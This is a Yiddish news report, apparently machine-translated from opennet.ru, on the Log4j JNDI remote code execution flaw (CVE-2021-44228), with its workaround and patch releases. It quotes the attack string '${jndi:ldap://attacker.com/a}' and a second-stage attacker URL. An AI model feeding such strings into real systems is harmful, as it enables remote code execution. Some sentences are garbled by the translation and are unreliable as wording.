קאַטאַסטראָפיק וואַלנעראַביליטי אין Apache Log4j אַפעקץ פילע ז'אבא פראיעקטן

אין Apache Log4j, אַ פאָלקס פריימווערק פֿאַר אָרגאַנייזינג לאָגינג אין Java אַפּלאַקיישאַנז, אַ קריטיש וואַלנעראַביליטי איז יידענאַפייד אַז אַלאַוז אַרביטראַריש קאָד צו זיין עקסאַקיוטאַד ווען אַ ספּעשלי פאָרמאַטטעד ווערט אין די "{jndi: URL}" פֿאָרמאַט איז געשריבן צו די קלאָץ. די באַפאַלן קענען זיין דורכגעקאָכט אויף ז'אבא אַפּלאַקיישאַנז וואָס קלאָץ וואַלועס באקומען פון פונדרויסנדיק קוואלן, למשל ווען ווייַזנדיק פּראָבלעמאַטיק וואַלועס אין טעות אַרטיקלען.

עס איז באמערקט אַז כּמעט אַלע פּראַדזשעקס ניצן פראַמעוואָרקס אַזאַ ווי Apache Struts, Apache Solr, Apache Druid אָדער Apache Flink זענען אַפעקטאַד דורך דעם פּראָבלעם, אַרייַנגערעכנט Steam, Apple iCloud, Minecraft קלייאַנץ און סערווערס. עס איז דערוואַרט אַז די וואַלנעראַביליטי קען פירן צו אַ כוואַליע פון ​​מאַסיוו אנפאלן אויף פֿירמע אַפּלאַקיישאַנז, ריפּיטינג די געשיכטע פון ​​קריטיש וואַלנעראַביליטיז אין די Apache Struts פריימווערק, וואָס, לויט אַ פּראָסט אָפּשאַצונג, איז געניצט אין וועב אַפּלאַקיישאַנז דורך 65% פון פאָרטשון. 100 קאָמפּאַניעס אַרייַנגערעכנט פרווון צו יבערקוקן די נעץ פֿאַר שפּירעוודיק סיסטעמען.

דער פּראָבלעם איז פאַרערגערט דורך די פאַקט אַז אַ ארבעטן עקספּלויט איז שוין ארויס, אָבער פיקסיז פֿאַר די סטאַביל צווייגן זענען נאָך נישט צונויפגעשטעלט. די CVE אידענטיפיצירן איז נאָך נישט אַסיינד. דער פאַרריכטן איז בלויז אַרייַנגערעכנט אין די log4j-2.15.0-rc1 פּרובירן צווייַג. ווי אַ וואָרקאַראָונד פֿאַר בלאַקינג די וואַלנעראַביליטי, עס איז רעקאַמענדיד צו שטעלן די log4j2.formatMsgNoLookups פּאַראַמעטער צו אמת.

דער פראבלעם איז געווען געפֿירט דורך log4j'ס שטיצע פֿאַר פּראַסעסינג ספּעציעלע מאַסקעס "{}" אין לאָג שורות, וואָס קענען געניצט ווערן צו דורכפירן JNDI (Java Naming and Directory Interface) פֿראַגעס. די אַטאַקע קומט אַראָפּ צו דורכגעבן אַ סטרינג מיט דער סאַבסטיטוציע "${jndi:ldap://attacker.com/a}", וואָס, ווען פּראַסעסט, וועט log4j שיקן סערווער attacker.com LDAP קווערי פארן דזשאווא קלאס וועג. צוריקגעגעבן סערווער דער אטאקירער'ס וועג (למשל http://second-stage.attacker.com/Exploit.class) וועט ווערן געלאָדן און אויסגעפירט אין דעם קאנטעקסט פון דעם איצטיקן פּראָצעס, און דאָס וועט דערמעגלעכן דעם אטאקירער אויסצופירן אַרביטרערן קאָד אויף דער סיסטעם מיט די פּריווילעגיעס פון דער איצטיקער אַפּליקאַציע.

אַדענדום 1: די וואַלנעראַביליטי איז אַסיינד די ידענטיפיער CVE-2021-44228.

אַדענדום 2: א וועג צו בייפּאַס די שוץ צוגעגעבן דורך מעלדונג log4j-2.15.0-rc1 איז יידענאַפייד. א נייַע דערהייַנטיקן, log4j-2.15.0-rc2, איז פארגעלייגט מיט מער פולשטענדיק שוץ קעגן די וואַלנעראַביליטי. דער קאָד כיילייץ די ענדערונג פֿאַרבונדן מיט דער אַוועק פון אַן אַבנאָרמאַל טערמאַניישאַן אין די פאַל פון ניצן אַ ינקערעקטלי פאָרמאַטטעד JNDI URL.

מקור: opennet.ru